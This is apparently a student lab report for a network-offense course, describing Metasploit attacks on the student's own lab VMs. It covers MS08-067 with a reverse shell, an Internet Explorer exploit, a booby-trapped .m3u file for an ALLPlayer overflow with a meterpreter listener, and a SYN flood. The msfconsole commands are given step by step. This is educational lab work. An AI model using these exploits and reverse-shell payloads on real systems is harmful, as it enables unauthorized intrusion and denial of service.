MSF基础应用
20175307 2020-4 《网络对抗技术》Exp6 MSF基础应用 Week10
一、实践目标
1、实践对象
Kali Linux
Metasploitable Linux
Windows 10
Windows 7
Windows XP
2、实践内容
- 成功主动攻击,如ms08-067
- 成功针对浏览器的攻击,如ms11-050
- 成功针对客户端的攻击,如Adobe
- 成功应用辅助模块的攻击
二、实践过程
1.主动攻击实践
(1)MS08-067漏洞渗透攻击实践(成功)
1.使用Nmap探测靶机的漏洞
nmap -sS -A --srcipt=smb-vuln-ms08-067 -PO 192.168.43.143
2.启动msfconsole查找漏洞
msfconsol
进入msfconsol控制台
search ms08_067
查看漏洞
3.查看可以使用的payload
show payloads
ms08_067 payloads
4.查看可以被攻击靶机的操作系统版本
show targets
5.设置攻击载荷和连接需要的参数
set payload generic/shell_reverse_tcp
set LHOST 192.168.43.132
set RHOST 192.168.43.144
set RPORT 5307
set LPORT 5307
exploit
6.出现Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.43.144:5307). 问题
更改回默认port,就可以了
7.开始入侵:
ipconfig/all命令查看当前电脑网卡的ip信息、DNS信息、DHCP服务器信息等
(2)浏览器的攻击(成功/唯一)
先通过msf搜索漏洞
search Internet
选择了MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
这个漏洞正好针对于Windows XP的IE6浏览器
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.144
成功反弹连接
(3)针对客户端的攻击----ALLPlayer 5.8.1 溢出漏洞(成功、唯一)
首先,我查看了cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
下的已知客户端的漏洞攻击的rb文件。经过10几种攻击的尝试,最后通过allplayer_m3u_bof.rb
完成了针对客户端的攻击。
1.查看文档
vim allplayer_m3u_bof.rb
大致意思是在AllPlayer5.8.1版本上发现了一个对.m3u文件的溢出漏洞。并在win7 SCP1上可以很好的运行。
2.配置并生成m3u文件
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.132
set LpoRT 5307
set FILENAME 5307.m3u
3.靶机准备换机
首先在http://www.skycn.com/soft/appid/80.html下载ALLplayer5.8.1
安装之后,将攻击机的文件拷贝到靶机XP
4.Kali监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.132
set LPORT 5307
exploit
5.冲!
XP双击5307.m3u文件,Kali就获取到了shell,
(4)辅助模块攻击
采用的是dos/tcp模块下的synflood攻击,
设定了300个数据包
win7通过wireshark抓包,tcp连接正好从271到571
三、问题回答和感想
1.问题:用自己的话解释什么是exploit,payload,encode
-
exploit 利用系统、程序或服务的漏洞进行攻击
-
payload 攻击者在靶机上执行的一段代码,即载荷,该代码具有反弹连接、创建用户、执行其他系统命令的功能。
-
encode 可以使载荷进行一个编码,躲过杀软的检测,以便获取更好的攻击效果。
2.感想:
为了完成本次实验,我煞费苦心,浏览了很多帮助文档。通过浏览每一个攻击的描述,我觉得在我们这个看似平和稳定的网络世界里,其实是暗藏杀机的,很多人想通过软件、系统、服务的漏洞去获取不应该属于他们的东西。这和创建这些系统、软件、服务的作者的初衷是背道而驰的,本来这些都是去帮助人们来更好的浏览这个世界,但是这些作品却因为作者的安全意识不强。而沦为了坏人手中的工具。我觉得挺可悲的。
posted on 2020-04-26 20:33 20175307GSC 阅读(721) 评论(0) 编辑 收藏 举报